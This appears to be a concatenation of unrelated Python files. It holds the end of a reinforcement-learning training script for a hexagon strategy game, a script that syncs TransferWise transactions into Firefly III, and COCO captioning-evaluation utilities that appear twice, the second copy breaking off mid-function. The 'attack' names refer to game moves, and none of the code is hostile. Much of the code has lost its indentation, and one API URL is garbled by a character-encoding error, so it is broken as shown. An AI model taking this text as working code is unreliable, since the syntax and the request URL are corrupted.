self.modelName = modelName if modelName is not None else 'Attack_model_params.h5f' + str(r.uniform(0, 10000000))
model = Sequential()
model.add(Conv2D(128, (5, 5), padding='same', activation='relu',
input_shape=EnvDef.SPATIAL_INPUT + (1, ), name='INPUT_ATTACK'))
model.add(Conv2D(64, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(4, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(1, (3, 3), padding='same', activation='tanh'))
model.add(Flatten())
model.add(Dense(EnvDef.SPATIAL_OUTPUT[0], activation='tanh'))
self.model = model
@staticmethod
def prepare_x(X, batch=False):
"""
:type X: ndarray
:type batch: bool
:return:
"""
shape = EnvDef.SPATIAL_INPUT + (1, )
if batch:
shape = (X.shape[0], ) + shape
return np.reshape(X, shape)
@staticmethod
def prepare_y(Y, batch=False):
"""
:type Y: ndarray
:type batch: bool
:return:
"""
shape = EnvDef.SPATIAL_OUTPUT + (1, )
if batch:
shape = (Y.shape[0], ) + shape
return np.reshape(Y, shape)
@staticmethod
def process_y(Y):
"""
:type Y: ndarray
:return:
"""
return np.reshape(Y, EnvDef.SPATIAL_OUTPUT)
# ______________________________________________________________________________________________________________________________
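# Training entry point: a CEM agent decides whether to boost while a masked DQN agent
# picks attack cells; both are wrapped in a MultiAgent and trained against
# HierarchicalCentaurEnv. Run with "train" to fit and save weights, or "test" to evaluate.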
if __name__ == '__main__':
args = menu()
env = HierarchicalCentaurEnv(opponent_randomness=args.randomness,
centaur_boost_likelihood=args.centaur_boost_likelihood,
boosting_off=args.boostingoff, attack_off=args.attackoff,
game_verbose=EnvDef.GAME_VERBOSE, radius=EnvDef.RADIUS,
move_shuffle=args.moveshuffle, move_handicap=args.handicap)
np.random.seed(42)
env.seed(42)
prc = CentaurDecisionProcessor()
dec_model = DecisionModel()
attack_model = SimpleAttackModel('Attack_model_params.h5f')
prc = MultiProcessor({AgentType.BoostDecision: prc, AgentType.Attack: CentaurAttackProcessor(EnvDef.SPATIAL_INPUT, random_action=args.randomaction)})
memory = EpisodeParameterMemory(limit=1000, window_length=1)
decision_agent = CEMAgent(model=dec_model.model, nb_actions=EnvDef.DECISION_ACTION_SPACE, memory=memory,
batch_size=50, nb_steps_warmup=200, train_interval=50, elite_frac=0.05)
decision_agent.compile()
memory2 = SequentialMemory(limit=100000, window_length=1)
policy = NoneZeroEpsGreedyQPolicy()
attack_agent = MaskableDQNAgent(attack_model.model,
policy=policy, batch_size=16,
processor=prc.inner_processors[AgentType.Attack],
nb_actions=EnvDef.SPATIAL_OUTPUT[0],
memory=memory2, nb_steps_warmup=500,
enable_dueling_network=True,
mask_processor=prc.inner_processors[AgentType.Attack] if args.usemasking else None)
agent = MultiAgent({AgentType.BoostDecision: decision_agent, AgentType.Attack: attack_agent}, processor=prc, save_frequency=0.05)
agent.inner_agents[AgentType.Attack].compile(Adam(lr=0.001), metrics=['mean_squared_logarithmic_error'])
if args.model_name is not None:
agent.inner_agents[AgentType.Attack].load_weights(args.model_name)
hexagon_ui_api.run_in_background()
if len(sys.argv) == 1:
print('Usage: python centaur_ai_gym.py (train|test)')
elif sys.argv[1] == 'train':
agent.fit(env, nb_steps=300 * 1000, visualize=False, verbose=2, interim_filenames={AgentType.Attack: attack_model.modelName})
agent.save_weights({AgentType.BoostDecision: dec_model.modelName, AgentType.Attack: attack_model.modelName}, overwrite=True)
elif sys.argv[1] == 'test':
agent.test(env, nb_episodes=100)
else:
print('argument not recognised: ' + sys.argv[1])
|
dqn_centaur_ai_gym.py
|
| 0.756447 | 0.355719 |
import csv
import json
import logging
import os
import urllib3
import time
from datetime import datetime, timedelta
from typing import Dict, List
# Globals
TRANSFERWISE_BASE_URI = None
FIREFLY_BASE_URI = None
category_map = {}
currency_accounts = {}
logging.getLogger().setLevel(logging.INFO)
http = urllib3.PoolManager()
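# Required environment variables (validated in validate_env below): TRANSFERWISE_BASE_URI,
# FIREFLY_BASE_URI, TRANSFERWISE_TOKEN, FIREFLY_TOKEN, FETCH_PERIOD (days), FETCH_CURRENCIES,
# CONVERT_AMOUNTS and BASE_CURRENCY. Two config files are also expected:
# config/categories-map.json (TransferWise category -> Firefly category/budget) and
# config/accounts.json (currency code -> Firefly account id).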
def main():
global TRANSFERWISE_BASE_URI
global FIREFLY_BASE_URI
global category_map
global currency_accounts
validate_env()
TRANSFERWISE_BASE_URI = os.environ['TRANSFERWISE_BASE_URI']
FIREFLY_BASE_URI = os.environ['FIREFLY_BASE_URI']
if not os.path.exists('config/categories-map.json'):
logging.error("categories-map.json not found, exiting.")
exit(1)
with open('config/categories-map.json', 'r') as fp:
category_map = json.load(fp)
if not os.path.exists('config/accounts.json'):
logging.error("accounts.json not found, exiting.")
exit(1)
with open('config/accounts.json', 'r') as fp:
currency_accounts = json.load(fp)
tranferwise_user_id = get_user_id()
tranferwise_account_id = get_account_id()
# Calculate the difference in days, batch it by 180 if larger
end = datetime.utcnow()
start = datetime.utcnow() - timedelta(days=int(os.environ['FETCH_PERIOD'])) - timedelta(seconds=1)
while (end - start).days > 0:
        period_length = min((end - start).days, 180)
period_end = start + timedelta(days=period_length)
for currency in currency_accounts:
logging.info(
f"Fetching {currency} transactions between {start.strftime('%Y-%m-%d')} and {period_end.strftime('%Y-%m-%d')}")
transactions = fetch_txs_from_transferwise(tranferwise_user_id, tranferwise_account_id, currency, start,
period_end)
logging.info(f"Writing {len(transactions)} transactions.")
for transaction in transactions:
if transaction.currency_code not in currency_accounts:
logging.error(f"{transaction.currency_code} not found in accounts.json")
exit(1)
account_id = currency_accounts[transaction.currency_code]
post_tx_to_firefly(transaction, account_id)
start = start + timedelta(days=period_length + 1)
def validate_env():
    """
    Check that either the .env or ENV contains the required values.
    :return:
    """
    def check_string(key: str, expected_type: str):
        try:
            if os.environ[key] is None or os.environ[key] == '':
                raise KeyError()
            if expected_type == 'str':
                str(os.environ[key])
            if expected_type == 'int':
                int(os.environ[key])
            if expected_type == 'bool':
                if str(os.environ[key]).lower() not in ['true', 'false']:
                    raise ValueError
        except (KeyError, ValueError):
            logging.error(f"{key} was not set correctly in .env or ENV, please provide a valid {expected_type}.")
            exit(1)
    check_string('TRANSFERWISE_BASE_URI', 'str')
    check_string('FIREFLY_BASE_URI', 'str')
    check_string('TRANSFERWISE_TOKEN', 'str')
    check_string('FIREFLY_TOKEN', 'str')
    check_string('FETCH_PERIOD', 'int')
    check_string('FETCH_CURRENCIES', 'str')
    check_string('CONVERT_AMOUNTS', 'bool')
    check_string('BASE_CURRENCY', 'str')
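# Illustrative .env -- the values below are placeholders, not real endpoints or tokens:
#   TRANSFERWISE_BASE_URI=https://api.transferwise.com
#   FIREFLY_BASE_URI=https://firefly.example.com
#   TRANSFERWISE_TOKEN=<personal API token>
#   FIREFLY_TOKEN=<personal access token>
#   FETCH_PERIOD=30
#   FETCH_CURRENCIES=GBP,EUR
#   CONVERT_AMOUNTS=true
#   BASE_CURRENCY=GBP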
class Transaction:
id: str
tx_type: str
date: datetime
amount: float
currency_code: str
category_name: str
foreign_code: str
foreign_amount: float
raw_category: str
budget_name: str
description: str
notes: str
source_id: str
destination_id: str
reconciled: bool
def __init__(self, id: str, tx_type: str, date: datetime, amount: float, currency_code: str, foreign_code: str,
foreign_amount: float, raw_category: str, description: str, notes: str):
self.id = id
self.tx_type = tx_type
self.date = date.replace(microsecond=0)
self.amount = amount
self.currency_code = currency_code
self.foreign_code = foreign_code
self.foreign_amount = foreign_amount
self.description = description
self.notes = notes
        # DEBIT entries leave the wallet account; CREDIT entries arrive into it.
        self.source_id = self.determine_account() if tx_type == 'DEBIT' else None
        self.destination_id = None if tx_type == 'DEBIT' else self.determine_account()
self.reconciled = True
self.raw_category = raw_category
self.category_name = self.determine_category()
self.budget_name = self.determine_budget()
def determine_category(self):
global category_map
if self.raw_category == '':
return None
if self.raw_category in category_map:
return category_map[self.raw_category]['category']
logging.error(f"Category seen in transaction but not in category_map: '{self.raw_category}'.")
if 'Converted' in self.description or 'Received' in self.description:
return None
if self.description == 'Sent money to Homerental Nordic AB':
return None
return 'Other'
def determine_budget(self):
global category_map
if self.raw_category == '':
return None
if self.raw_category in category_map:
return category_map[self.raw_category]['budget']
logging.error(f"Category seen in transaction but not in category_map: '{self.raw_category}'.")
if 'Converted' in self.description or 'Received' in self.description:
return None
if self.description == 'Sent money to Homerental Nordic AB':
return None
return 'Other'
def determine_account(self):
global currency_accounts
return currency_accounts[self.currency_code]
def get_user_id() -> str:
return "3750372"
def get_account_id() -> str:
return "4067808"
def fetch_exchange_rate_from_yahoo(from_code: str, to_code: str, start: datetime, end: datetime, retry=0) -> \
        Dict[str, float]:
    """
    Fetch exchange rates from Yahoo Finance between two dates.
    Little bit tricky, as some pairs don't trade over the weekend.
    If any day between `start` and `end` was a non-trading day, use the previous or next rate seen.
    :param from_code:
    :param to_code:
    :param start:
    :param end:
    :param retry:
    :return:
    """
    if retry > 4:
        logging.error("Failed to fetch from Yahoo after 5 attempts, giving up.")
        exit(1)
    res = http.request('GET', f"https://query1.finance.yahoo.com/v7/finance/download/{from_code}{to_code}=X?period1={int(start.timestamp())}&period2={int(end.timestamp())}&interval=1d&events=history")  # noqa E401
    if res.status != 200:
        time.sleep(5)
        return fetch_exchange_rate_from_yahoo(from_code, to_code, start, end, retry + 1)
    rates = {}
    last_seen = None
    # Skip the CSV header and any blank/short rows (a trailing newline yields an empty row).
    rows = [row for row in csv.reader(res.data.decode().split("\n")) if len(row) >= 5][1:]
    results = {row[0]: row[4] for row in rows}
    end = end + timedelta(days=1)
    for date in [start + timedelta(days=n) for n in range((end - start).days)]:
        formatted_date = date.strftime("%Y-%m-%d")
        if formatted_date not in results:
            # Non-trading day: carry the last seen rate forward (or use the first rate available).
            rates[formatted_date] = rows[0][4] if last_seen is None else last_seen
            continue
        rates[formatted_date] = results[formatted_date]
        last_seen = results[formatted_date]
    return {date: float(rate) for date, rate in rates.items()}
def fetch_txs_from_transferwise(user_id: str, account_id: str, currency: str, start: datetime, end: datetime) -> \
List[Transaction]:
"""
Fetch transactions from TransferWise
:param user_id:
:param account_id:
:param currency:
:param start:
:param end:
:return:
"""
global TRANSFERWISE_BASE_URI
global category_map
global currency_accounts
start = start.replace(microsecond=0)
end = end.replace(microsecond=0)
uri = f"/v3/profiles/{user_id}/borderless-accounts/{account_id}/statement.json?intervalStart={start.isoformat()}Z&intervalEnd={end.isoformat()}Z¤cy={currency}"
res = http.request("GET", f"{TRANSFERWISE_BASE_URI}{uri}", headers={
'Authorization': 'Bearer ' + os.environ['TRANSFERWISE_TOKEN']
})
if res.status == 401:
logging.error('Unauthorized response fetching transactions, check API token.')
exit()
if res.status != 200:
        logging.error(f'Failed to fetch transactions for a non-auth reason. {res.status}: {res.data.decode()}')
exit()
fx_rates = {}
    convert_amounts = os.environ['CONVERT_AMOUNTS'].lower() == 'true'
if convert_amounts and currency != os.environ['BASE_CURRENCY']:
fx_rates = fetch_exchange_rate_from_yahoo(from_code=currency, to_code=os.environ['BASE_CURRENCY'], start=start,
end=end)
body = json.loads(res.data.decode("utf-8"))
transactions = []
for row in body['transactions']:
currency_code = row['amount']['currency']
reference = row['referenceNumber']
amount = abs(row['amount']['value'])
tx_type = row['type']
category = row['details']['category'] if 'category' in row['details'] else ''
date = datetime.strptime(row['date'], '%Y-%m-%dT%H:%M:%S.%fZ')
description = row['details']['description'].replace("Card transaction of ", '')
raw = row
foreign_amount = 0.0
if convert_amounts and currency != os.environ['BASE_CURRENCY']:
fx_date = date.strftime("%Y-%m-%d")
foreign_amount = round(fx_rates[fx_date] * amount, 2)
raw['foreignAmount'] = foreign_amount
raw['foreignFxRate'] = fx_rates[fx_date]
tx = Transaction(id=reference, amount=amount, tx_type=tx_type, raw_category=category, date=date,
description=description, currency_code=currency_code, foreign_code=os.environ['BASE_CURRENCY'],
foreign_amount=foreign_amount, notes=json.dumps(raw))
transactions.append(tx)
return transactions
def search_for_existing_tx(tx: Transaction) -> int:
"""
Searches Firefly for a Transaction with a description LIKE TransferWiseID-{currency}
Fails if it finds > 1, returns 0 if it finds 0, ID if it finds 1.
:param tx:
:return:
"""
res = http.request("GET", FIREFLY_BASE_URI + "/api/v1/search/transactions",
fields={'query': f'{tx.id}-{tx.currency_code}'}, headers={
'Authorization': 'Bearer ' + os.environ['FIREFLY_TOKEN'],
'Accept': 'application/json',
'Content-Type': 'application/json'
})
if res.status == 401:
logging.error('Unauthorized response posting transactions, check API token.')
exit()
if res.status != 200:
logging.error(f'Failed to search transactions for a non-auth reason. {res.status}: {res.data.decode()}')
exit()
body = json.loads(res.data)
if len(body['data']) > 1:
ids = [x['id'] for x in body['data']]
logging.error(f"Received more than one transaction like {tx.id}, IDs: {ids}. Please fix / report bug.")
exit(1)
if len(body['data']) == 1:
return int(body['data'][0]['id'])
return 0
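# Upsert behaviour: every description ends with "(<TransferWise reference>-<currency>)",
# so search_for_existing_tx can find a previously imported transaction and
# post_tx_to_firefly issues a PUT (update) instead of a POST (create) when one exists,
# keeping re-runs idempotent.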
def post_tx_to_firefly(tx: Transaction, account_id: str) -> bool:
"""
Form the Transaction object ready for ingestion by Firefly and post.
:param tx:
:param account_id:
:return:
"""
global FIREFLY_BASE_URI
tx_body = {
"external_id": tx.id,
"type": "deposit" if tx.tx_type in 'CREDIT' else 'withdrawal',
"date": tx.date.isoformat() + "Z",
"amount": str(tx.amount),
"currency_code": tx.currency_code,
"foreign_currency_code": None,
"foreign_amount": str(0.0),
"category_name": tx.category_name,
"budget_name": tx.budget_name,
"description": f"{tx.description} ({tx.id}-{tx.currency_code})",
"notes": tx.notes,
"source_id": account_id if tx.tx_type == 'DEBIT' else None,
"destination_id": None if tx.tx_type == 'DEBIT' else account_id,
"reconciled": True,
}
# Even if these were attempted, if the amount is 0.0 then we failed the Yahoo fetch, don't attempt it.
if tx.foreign_code != '' and tx.foreign_amount != 0.0:
# If you want to set this in Firefly, remove the pass and uncomment
pass
# tx_body['foreign_currency_code'] = tx.foreign_code
# tx_body['foreign_amount'] = str(tx.foreign_amount)
payload = {
"error_if_duplicate_hash": False,
"apply_rules": False,
"group_title": "TW",
"transactions": [tx_body]
}
existing_id = search_for_existing_tx(tx)
if existing_id != 0:
res = http.request("PUT", f"{FIREFLY_BASE_URI}/api/v1/transactions/{existing_id}", body=json.dumps(payload), headers={
'Authorization': 'Bearer ' + os.environ['FIREFLY_TOKEN'],
'Accept': 'application/json',
'Content-Type': 'application/json'
})
else:
res = http.request("POST", f"{FIREFLY_BASE_URI}/api/v1/transactions", body=json.dumps(payload), headers={
'Authorization': 'Bearer ' + os.environ['FIREFLY_TOKEN'],
'Accept': 'application/json',
'Content-Type': 'application/json'
})
if res.status == 422:
logging.error(f'Failed to put transaction {tx.id}: {res.data.decode()}')
return True
if res.status == 401:
logging.error('Unauthorized response posting transactions, check API token.')
exit()
if res.status != 200:
logging.error(f'Failed to post transactions for a non-auth reason. {res.status}: {res.data.decode()}')
exit()
return True
if __name__ == '__main__':
main()
|
transferwise/src/main.py
|
| 0.595375 | 0.145358 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import numpy as np
import json
from json import encoder
import random
import string
import time
import os
import sys
from . import misc as utils
from .eval_utils import getCOCO
from .div_utils import compute_div_n, compute_global_div_n
SPICE_THREADS=4
import sys
try:
sys.path.append("coco-caption")
annFile = 'coco-caption/annotations/captions_val2014.json'
from pycocotools.coco import COCO
from pycocoevalcap.eval import COCOEvalCap
from pycocoevalcap.eval_spice import COCOEvalCapSpice
from pycocoevalcap.tokenizer.ptbtokenizer import PTBTokenizer
from pycocoevalcap.bleu.bleu import Bleu
sys.path.append("cider")
from pyciderevalcap.cider.cider import Cider
except:
print('Warning: requirements for eval_multi not satisfied')
def eval_allspice(dataset, preds_n, model_id, split):
coco = getCOCO(dataset)
valids = coco.getImgIds()
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
# filter results to only those in MSCOCO validation set (will be about a third)
preds_filt_n = [p for p in preds_n if p['image_id'] in valids]
print('using %d/%d predictions_n' % (len(preds_filt_n), len(preds_n)))
cache_path_n = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
json.dump(preds_filt_n, open(cache_path_n, 'w')) # serialize to temporary json file. Sigh, COCO API...
# Eval AllSPICE
cocoRes_n = coco.loadRes(cache_path_n)
cocoEvalAllSPICE = COCOEvalCapSpice(coco, cocoRes_n)
cocoEvalAllSPICE.params['image_id'] = cocoRes_n.getImgIds()
cocoEvalAllSPICE.evaluate()
out = {}
for metric, score in cocoEvalAllSPICE.eval.items():
out['All'+metric] = score
imgToEvalAllSPICE = cocoEvalAllSPICE.imgToEval
# collect SPICE_sub_score
for k in list(imgToEvalAllSPICE.values())[0]['SPICE'].keys():
if k != 'All':
out['AllSPICE_'+k] = np.array([v['SPICE'][k]['f'] for v in imgToEvalAllSPICE.values()])
out['AllSPICE_'+k] = (out['AllSPICE_'+k][out['AllSPICE_'+k]==out['AllSPICE_'+k]]).mean()
for p in preds_filt_n:
image_id, caption = p['image_id'], p['caption']
imgToEvalAllSPICE[image_id]['caption'] = capsById[image_id]
return {'overall': out, 'imgToEvalAllSPICE': imgToEvalAllSPICE}
def eval_oracle(dataset, preds_n, model_id, split):
cache_path = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
coco = getCOCO(dataset)
valids = coco.getImgIds()
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
sample_n = capsById[list(capsById.keys())[0]]
for i in range(len(capsById[list(capsById.keys())[0]])):
preds = [_[i] for _ in capsById.values()]
json.dump(preds, open(cache_path, 'w')) # serialize to temporary json file. Sigh, COCO API...
cocoRes = coco.loadRes(cache_path)
cocoEval = COCOEvalCap(coco, cocoRes, spice_threads=SPICE_THREADS)
cocoEval.params['image_id'] = cocoRes.getImgIds()
cocoEval.evaluate()
imgToEval = cocoEval.imgToEval
for img_id in capsById.keys():
tmp = imgToEval[img_id]
for k in tmp['SPICE'].keys():
if k != 'All':
tmp['SPICE_'+k] = tmp['SPICE'][k]['f']
if tmp['SPICE_'+k] != tmp['SPICE_'+k]: # nan
tmp['SPICE_'+k] = -100
tmp['SPICE'] = tmp['SPICE']['All']['f']
if tmp['SPICE'] != tmp['SPICE']: tmp['SPICE'] = -100
capsById[img_id][i]['scores'] = imgToEval[img_id]
out = {'overall': {}, 'ImgToEval': {}}
for img_id in capsById.keys():
out['ImgToEval'][img_id] = {}
for metric in capsById[img_id][0]['scores'].keys():
if metric == 'image_id': continue
out['ImgToEval'][img_id]['oracle_'+metric] = max([_['scores'][metric] for _ in capsById[img_id]])
out['ImgToEval'][img_id]['avg_'+metric] = sum([_['scores'][metric] for _ in capsById[img_id]]) / len(capsById[img_id])
out['ImgToEval'][img_id]['captions'] = capsById[img_id]
for metric in list(out['ImgToEval'].values())[0].keys():
if metric == 'captions':
continue
tmp = np.array([_[metric] for _ in out['ImgToEval'].values()])
tmp = tmp[tmp!=-100]
out['overall'][metric] = tmp.mean()
return out
def eval_div_stats(dataset, preds_n, model_id, split):
tokenizer = PTBTokenizer()
capsById = {}
for i, d in enumerate(preds_n):
d['id'] = i
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
n_caps_perimg = len(capsById[list(capsById.keys())[0]])
print(n_caps_perimg)
_capsById = capsById # save the untokenized version
capsById = tokenizer.tokenize(capsById)
div_1, adiv_1 = compute_div_n(capsById,1)
div_2, adiv_2 = compute_div_n(capsById,2)
globdiv_1, _= compute_global_div_n(capsById,1)
print('Diversity Statistics are as follows: \n Div1: %.2f, Div2: %.2f, gDiv1: %d\n'%(div_1,div_2, globdiv_1))
# compute mbleu
scorer = Bleu(4)
all_scrs = []
scrperimg = np.zeros((n_caps_perimg, len(capsById)))
for i in range(n_caps_perimg):
tempRefsById = {}
candsById = {}
for k in capsById:
tempRefsById[k] = capsById[k][:i] + capsById[k][i+1:]
candsById[k] = [capsById[k][i]]
score, scores = scorer.compute_score(tempRefsById, candsById)
all_scrs.append(score)
scrperimg[i,:] = scores[1]
all_scrs = np.array(all_scrs)
out = {}
out['overall'] = {'Div1': div_1, 'Div2': div_2, 'gDiv1': globdiv_1}
for k, score in zip(range(4), all_scrs.mean(axis=0).tolist()):
out['overall'].update({'mBLeu_%d'%(k+1): score})
imgToEval = {}
for i,imgid in enumerate(capsById.keys()):
imgToEval[imgid] = {'mBleu_2' : scrperimg[:,i].mean()}
imgToEval[imgid]['individuals'] = []
for j, d in enumerate(_capsById[imgid]):
imgToEval[imgid]['individuals'].append(preds_n[d['id']])
imgToEval[imgid]['individuals'][-1]['mBleu_2'] = scrperimg[j,i]
out['ImgToEval'] = imgToEval
    print('Mean mutual Bleu scores on this set are:\nmBLeu_1, mBLeu_2, mBLeu_3, mBLeu_4')
print(all_scrs.mean(axis=0))
return out
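# --- Hedged usage sketch (not part of the original module) ---
# All eval_* helpers above take `preds_n` as a flat list of
# {'image_id': ..., 'caption': ...} dicts with several sampled captions per
# image. The ids and captions below are invented, and a real call also needs
# the coco-caption / cider checkouts importable, as handled at the top of
# this file.
# preds_n = [
#     {'image_id': 42, 'caption': 'a cat sits on a mat'},
#     {'image_id': 42, 'caption': 'a small cat on a rug'},
#     {'image_id': 77, 'caption': 'a dog runs in a field'},
#     {'image_id': 77, 'caption': 'a brown dog outdoors'},
# ]
# out = eval_div_stats('coco', preds_n, model_id='demo', split='val')
# out['overall']  # -> {'Div1': ..., 'Div2': ..., 'gDiv1': ..., 'mBLeu_1': ..., ...}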
def eval_self_cider(dataset, preds_n, model_id, split):
cache_path = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
coco = getCOCO(dataset)
valids = coco.getImgIds()
# Get Cider_scorer
Cider_scorer = Cider(df='corpus')
tokenizer = PTBTokenizer()
gts = {}
for imgId in valids:
gts[imgId] = coco.imgToAnns[imgId]
gts = tokenizer.tokenize(gts)
for imgId in valids:
Cider_scorer.cider_scorer += (None, gts[imgId])
Cider_scorer.cider_scorer.compute_doc_freq()
Cider_scorer.cider_scorer.ref_len = np.log(float(len(Cider_scorer.cider_scorer.crefs)))
# Prepare captions
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
capsById = tokenizer.tokenize(capsById)
imgIds = list(capsById.keys())
scores = Cider_scorer.my_self_cider([capsById[_] for _ in imgIds])
def get_div(eigvals):
eigvals = np.clip(eigvals, 0, None)
return -np.log(np.sqrt(eigvals[-1]) / (np.sqrt(eigvals).sum())) / np.log(len(eigvals))
sc_scores = [get_div(np.linalg.eigvalsh(_/10)) for _ in scores]
score = np.mean(np.array(sc_scores))
imgToEval = {}
for i, image_id in enumerate(imgIds):
imgToEval[image_id] = {'self_cider': sc_scores[i], 'self_cider_mat': scores[i].tolist()}
return {'overall': {'self_cider': score}, 'imgToEval': imgToEval}
|
captioning/utils/eval_multi.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import numpy as np
import json
from json import encoder
import random
import string
import time
import os
import sys
from . import misc as utils
from .eval_utils import getCOCO
from .div_utils import compute_div_n, compute_global_div_n
SPICE_THREADS=4
import sys
try:
sys.path.append("coco-caption")
annFile = 'coco-caption/annotations/captions_val2014.json'
from pycocotools.coco import COCO
from pycocoevalcap.eval import COCOEvalCap
from pycocoevalcap.eval_spice import COCOEvalCapSpice
from pycocoevalcap.tokenizer.ptbtokenizer import PTBTokenizer
from pycocoevalcap.bleu.bleu import Bleu
sys.path.append("cider")
from pyciderevalcap.cider.cider import Cider
except:
print('Warning: requirements for eval_multi not satisfied')
def eval_allspice(dataset, preds_n, model_id, split):
coco = getCOCO(dataset)
valids = coco.getImgIds()
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
# filter results to only those in MSCOCO validation set (will be about a third)
preds_filt_n = [p for p in preds_n if p['image_id'] in valids]
print('using %d/%d predictions_n' % (len(preds_filt_n), len(preds_n)))
cache_path_n = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
json.dump(preds_filt_n, open(cache_path_n, 'w')) # serialize to temporary json file. Sigh, COCO API...
# Eval AllSPICE
cocoRes_n = coco.loadRes(cache_path_n)
cocoEvalAllSPICE = COCOEvalCapSpice(coco, cocoRes_n)
cocoEvalAllSPICE.params['image_id'] = cocoRes_n.getImgIds()
cocoEvalAllSPICE.evaluate()
out = {}
for metric, score in cocoEvalAllSPICE.eval.items():
out['All'+metric] = score
imgToEvalAllSPICE = cocoEvalAllSPICE.imgToEval
# collect SPICE_sub_score
for k in list(imgToEvalAllSPICE.values())[0]['SPICE'].keys():
if k != 'All':
out['AllSPICE_'+k] = np.array([v['SPICE'][k]['f'] for v in imgToEvalAllSPICE.values()])
out['AllSPICE_'+k] = (out['AllSPICE_'+k][out['AllSPICE_'+k]==out['AllSPICE_'+k]]).mean()
for p in preds_filt_n:
image_id, caption = p['image_id'], p['caption']
imgToEvalAllSPICE[image_id]['caption'] = capsById[image_id]
return {'overall': out, 'imgToEvalAllSPICE': imgToEvalAllSPICE}
def eval_oracle(dataset, preds_n, model_id, split):
cache_path = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
coco = getCOCO(dataset)
valids = coco.getImgIds()
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
sample_n = capsById[list(capsById.keys())[0]]
for i in range(len(capsById[list(capsById.keys())[0]])):
preds = [_[i] for _ in capsById.values()]
json.dump(preds, open(cache_path, 'w')) # serialize to temporary json file. Sigh, COCO API...
cocoRes = coco.loadRes(cache_path)
cocoEval = COCOEvalCap(coco, cocoRes, spice_threads=SPICE_THREADS)
cocoEval.params['image_id'] = cocoRes.getImgIds()
cocoEval.evaluate()
imgToEval = cocoEval.imgToEval
for img_id in capsById.keys():
tmp = imgToEval[img_id]
for k in tmp['SPICE'].keys():
if k != 'All':
tmp['SPICE_'+k] = tmp['SPICE'][k]['f']
if tmp['SPICE_'+k] != tmp['SPICE_'+k]: # nan
tmp['SPICE_'+k] = -100
tmp['SPICE'] = tmp['SPICE']['All']['f']
if tmp['SPICE'] != tmp['SPICE']: tmp['SPICE'] = -100
capsById[img_id][i]['scores'] = imgToEval[img_id]
out = {'overall': {}, 'ImgToEval': {}}
for img_id in capsById.keys():
out['ImgToEval'][img_id] = {}
for metric in capsById[img_id][0]['scores'].keys():
if metric == 'image_id': continue
out['ImgToEval'][img_id]['oracle_'+metric] = max([_['scores'][metric] for _ in capsById[img_id]])
out['ImgToEval'][img_id]['avg_'+metric] = sum([_['scores'][metric] for _ in capsById[img_id]]) / len(capsById[img_id])
out['ImgToEval'][img_id]['captions'] = capsById[img_id]
for metric in list(out['ImgToEval'].values())[0].keys():
if metric == 'captions':
continue
tmp = np.array([_[metric] for _ in out['ImgToEval'].values()])
tmp = tmp[tmp!=-100]
out['overall'][metric] = tmp.mean()
return out
def eval_div_stats(dataset, preds_n, model_id, split):
tokenizer = PTBTokenizer()
capsById = {}
for i, d in enumerate(preds_n):
d['id'] = i
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
n_caps_perimg = len(capsById[list(capsById.keys())[0]])
print(n_caps_perimg)
_capsById = capsById # save the untokenized version
capsById = tokenizer.tokenize(capsById)
div_1, adiv_1 = compute_div_n(capsById,1)
div_2, adiv_2 = compute_div_n(capsById,2)
globdiv_1, _= compute_global_div_n(capsById,1)
print('Diversity Statistics are as follows: \n Div1: %.2f, Div2: %.2f, gDiv1: %d\n'%(div_1,div_2, globdiv_1))
# compute mbleu
scorer = Bleu(4)
all_scrs = []
scrperimg = np.zeros((n_caps_perimg, len(capsById)))
for i in range(n_caps_perimg):
tempRefsById = {}
candsById = {}
for k in capsById:
tempRefsById[k] = capsById[k][:i] + capsById[k][i+1:]
candsById[k] = [capsById[k][i]]
score, scores = scorer.compute_score(tempRefsById, candsById)
all_scrs.append(score)
scrperimg[i,:] = scores[1]
all_scrs = np.array(all_scrs)
out = {}
out['overall'] = {'Div1': div_1, 'Div2': div_2, 'gDiv1': globdiv_1}
for k, score in zip(range(4), all_scrs.mean(axis=0).tolist()):
out['overall'].update({'mBLeu_%d'%(k+1): score})
imgToEval = {}
for i,imgid in enumerate(capsById.keys()):
imgToEval[imgid] = {'mBleu_2' : scrperimg[:,i].mean()}
imgToEval[imgid]['individuals'] = []
for j, d in enumerate(_capsById[imgid]):
imgToEval[imgid]['individuals'].append(preds_n[d['id']])
imgToEval[imgid]['individuals'][-1]['mBleu_2'] = scrperimg[j,i]
out['ImgToEval'] = imgToEval
    print('Mean mutual Bleu scores on this set are:\nmBLeu_1, mBLeu_2, mBLeu_3, mBLeu_4')
print(all_scrs.mean(axis=0))
return out
def eval_self_cider(dataset, preds_n, model_id, split):
cache_path = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
coco = getCOCO(dataset)
valids = coco.getImgIds()
# Get Cider_scorer
Cider_scorer = Cider(df='corpus')
tokenizer = PTBTokenizer()
gts = {}
for imgId in valids:
gts[imgId] = coco.imgToAnns[imgId]
gts = tokenizer.tokenize(gts)
for imgId in valids:
Cider_scorer.cider_scorer += (None, gts[imgId])
Cider_scorer.cider_scorer.compute_doc_freq()
Cider_scorer.cider_scorer.ref_len = np.log(float(len(Cider_scorer.cider_scorer.crefs)))
# Prepare captions
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
capsById = tokenizer.tokenize(capsById)
imgIds = list(capsById.keys())
scores = Cider_scorer.my_self_cider([capsById[_] for _ in imgIds])
def get_div(eigvals):
eigvals = np.clip(eigvals, 0, None)
